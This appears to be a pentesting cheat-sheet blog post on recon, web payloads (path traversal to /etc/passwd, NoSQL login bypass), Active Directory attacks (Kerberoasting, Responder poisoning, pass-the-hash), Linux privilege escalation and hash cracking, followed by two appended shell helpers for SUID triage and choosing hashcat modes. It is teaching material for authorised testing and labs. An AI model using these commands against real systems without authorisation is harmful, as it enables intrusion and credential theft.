The Ultimate Pentester’s Cheat Sheet: From Recon to Active Directory

medium.com · Eugene Softley (softsec) · 12 days ago · tutorial
~3 min read · March 30, 2026 (Updated: March 30, 2026)

In the fast-paced world of cybersecurity, having a reliable "brain dump" is the difference between a successful engagement and a dead end. These are my personal notes, curated from countless hours of CTFs and labs, structured into a logical workflow.

1. External Recon & Information Gathering

Before touching the target, you need to know what exists.

Google & GitHub Dorking

Search engines are the most underrated hacking tools.

- Find exposed API keys: `intitle:"index of" api_key OR "api key" OR apiKey -pool`
- Exposed WordPress users: `inurl:"/wp-json/wp/v2/users"`
- GitHub sensitive data: search `"nasa.gov" passwd` (replace nasa.gov with your target domain).

Subdomain & Asset Discovery

Don't just scan a single IP; find the whole ecosystem.

- Passive discovery (amass): `amass enum -passive -d target.com`
- HTTP probing, to identify which subdomains are actually alive: `cat subs.txt | sort -u | httprobe --prefer-https > live_assets.txt`
- Technology identification: `whatweb -a 1 $IP` (stealthy) or `whatweb -a 3 $IP` (aggressive; it sends many more requests).

2. Web Vulnerability Research

Once you have a web target, the goal is to find entry points through fuzzing and parameter analysis.

Directory & Parameter Fuzzing

- Directory brute force (ffuf): `ffuf -w /path/to/wordlist -u https://target/FUZZ`
- Virtual host discovery: `ffuf -w subdomains.txt -u http://target.htb/ -H "Host: FUZZ.target.htb" -fc 302` (filter on whatever status or size the default vhost returns, here a 302).
- Hidden parameter mining: use arjun to find parameters the developers forgot to hide.
  `arjun -u https://api.target.com/endpoint -m POST`

Common Web Attack Payloads

- XSS (reflected): inject a script tag into a parameter the page echoes back and check whether it executes rather than being encoded.
- LFI / path traversal: Linux `../../../../etc/passwd`, Windows `..\..\..\windows\win.ini`
- NoSQL injection (login bypass): `{"username": {"$gt": ""}, "password": {"$gt": ""}}` (works when the application passes the JSON object straight into the query, so the `$gt` operator matches any non-empty value).

3. Active Directory (AD) Domination

In a Windows environment, AD is the "Holy Grail." Here is the path from zero to Domain Admin.

Initial Enumeration (ports 135, 445, 88)

- Check for null sessions: `rpcclient -U '' -N $IP` (then run `enumdomusers`; `-N` skips the password prompt).
- SMB share enumeration: `cme smb $IP --shares -u 'guest' -p ''` (same syntax with `nxc`, the maintained NetExec fork).
- RID cycling: if you have one set of valid creds, find all the other users. `lookupsid.py domain/user:pass@$IP`

Advanced AD Attacks

- Kerberoasting, requesting service tickets to crack offline: `GetUserSPNs.py -dc-ip $IP domain/user:pass -request`
- AS-REP roasting, targeting users who don't require pre-authentication: `GetNPUsers.py -dc-ip $IP -no-pass -usersfile users.txt domain/`
- LLMNR/NBT-NS poisoning, using Responder to intercept hashes on the wire: `responder -I eth0 -dwP` (`-d` also answers DHCP broadcasts to push a WPAD server; only use it where that is in scope).

4. Linux Post-Exploitation & PrivEsc

Once you have a shell, the real work begins.

Stabilization

Never work in a "dumb" shell. Stabilize it immediately:

  python3 -c "import pty; pty.spawn('/bin/bash')"
  # Then background with Ctrl+Z and run:
  stty raw -echo; fg

Finding the Path to Root

- SUID binaries (files that run as their owner, usually root): `find / -perm -u=s -type f 2>/dev/null`
- Capabilities: `getcap -r / 2>/dev/null`
- Sudo rights: `sudo -l`

Pro tip: always cross-reference SUID/sudo findings with GTFOBins. A SUID or sudo-able perl is a root shell outright; a SUID cat "only" reads files as root, but reading /etc/shadow or root's SSH keys is usually enough.

5. Quick Reference Tables

- Cracking (hashcat): `hashcat -m 1800 hash.txt rockyou.txt` (`-m 1800` is sha512crypt, the usual /etc/shadow format; Kerberos and NetNTLM hashes need their own modes).
- Pass-the-hash (psexec): `psexec.py user@$IP -hashes :` (the argument is `LMHASH:NTHASH`; the LM half can be left empty).
- API scanning (kiterunner): `kr scan http://api.target -w routes.kite`
- SQL injection (sqlmap): `sqlmap -r request.req --batch --dbs`

Final Thoughts

Pentesting is as much about the quality of your notes as it is about the speed of your typing.
This cheat sheet is a living document: keep it updated, keep it organized, and always stay curious.

#pentesting #bug-bounty #cheatsheet #active-directory-security #web-security
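For the "Finding the Path to Root" checks in section 4, here is an added example (my code, not from the article) that wraps the SUID search and the getcap output in two small triage functions and marks hits against a GTFOBins-style shortlist. The GTFOBINS variable is a hand-picked subset, not the full list, and the optional directory argument to triage_suid is my addition so the function can be pointed at a test tree instead of /.

```shell
#!/bin/sh
# Added example, not from the original article: triage helpers for the SUID and
# capability checks. GTFOBINS is a hand-picked shortlist (the real list at
# gtfobins.github.io is much longer); the directory argument lets the SUID
# search be pointed at a test tree instead of /.

GTFOBINS="bash sh dash perl python python3 ruby find vim vi nmap awk gawk less more cat tail tee env nano cp mv"

is_gtfobin() {
  # succeed if the basename of $1 is on the shortlist
  name=$(basename -- "$1")
  for b in $GTFOBINS; do
    [ "$b" = "$name" ] && return 0
  done
  return 1
}

triage_suid() {
  # Same search as the cheat sheet (-perm -4000 is the numeric form of -u=s),
  # with shortlist hits prefixed by "! " and everything else by two spaces.
  root="${1:-/}"
  find "$root" -perm -4000 -type f 2>/dev/null | while IFS= read -r f; do
    if is_gtfobin "$f"; then
      printf '! %s\n' "$f"
    else
      printf '  %s\n' "$f"
    fi
  done
}

triage_caps() {
  # Filter getcap -r output (old "path = cap+ep" or new "path cap=ep" format)
  # down to capabilities that lead to root: setuid/setgid give a root shell via
  # perl/python, the dac_* caps read or write any file, sys_admin and
  # sys_ptrace take more work but are still worth chasing.
  grep -E 'cap_(setuid|setgid|dac_read_search|dac_override|sys_admin|sys_ptrace)'
}

# Typical use on the target:
#   triage_suid | grep '^!'
#   getcap -r / 2>/dev/null | triage_caps
#   sudo -l
```

Anything printed with a leading `!` goes straight to the matching GTFOBins page; the rest of the SUID list is still worth a glance for custom binaries, which GTFOBins will never cover.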
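The Kerberoast, AS-REP and Responder commands in section 3 each produce a different hash format, and the `hashcat -m 1800` line in section 5 only fits sha512crypt. This added example (my code, not from the article) picks the hashcat mode from the hash's own format so the wrong mode is never used. The sample hashes in the test are constructed placeholders, and the `crack` wrapper and its rockyou.txt default are my assumptions.

```shell
#!/bin/sh
# Added example, not from the original article: map a captured hash line to
# its hashcat -m mode by format, instead of applying -m 1800 to everything.

hashcat_mode() {
  h="$1"
  case "$h" in
    '$6$'*)                  echo 1800 ;;   # sha512crypt (/etc/shadow on most Linux)
    '$5$'*)                  echo 7400 ;;   # sha256crypt
    '$1$'*)                  echo 500  ;;   # md5crypt
    '$2a$'*|'$2b$'*|'$2y$'*) echo 3200 ;;   # bcrypt
    '$krb5tgs$23$'*)         echo 13100 ;;  # Kerberoast, RC4 (etype 23) ticket
    '$krb5tgs$17$'*)         echo 19600 ;;  # Kerberoast, AES128 (etype 17)
    '$krb5tgs$18$'*)         echo 19700 ;;  # Kerberoast, AES256 (etype 18)
    '$krb5asrep$23$'*)       echo 18200 ;;  # AS-REP roast, RC4
    *)
      # Responder writes NetNTLM as user::DOMAIN:challenge:response:blob.
      # v2 has a 16-hex server challenge and a 32-hex NTProofStr; v1 has
      # 48-hex LM and NT responses followed by a 16-hex challenge. A bare
      # 32-hex string is an NT hash (pass-the-hash material, mode 1000).
      printf '%s\n' "$h" | awk -F: '
        NF == 6 && length($4) == 16 && length($5) == 32 && length($6) > 32 { print 5600; exit }
        NF == 6 && length($4) == 48 && length($5) == 48 && length($6) == 16 { print 5500; exit }
        NF == 1 && length($1) == 32 && $1 ~ /^[0-9a-fA-F]+$/            { print 1000; exit }
        { print "unknown"; exit }'
      ;;
  esac
}

crack() {
  # Usage: crack hashes.txt [wordlist]; picks the mode from the first line.
  mode=$(hashcat_mode "$(head -n 1 "$1")")
  if [ "$mode" = unknown ]; then
    echo "unrecognised hash format in $1" >&2
    return 1
  fi
  hashcat -m "$mode" "$1" "${2:-rockyou.txt}"
}
```

Note that an NT hash (mode 1000) is usually more useful unbroken, fed straight to `psexec.py -hashes`, whereas NetNTLMv2 from Responder cannot be passed and has to be cracked or relayed.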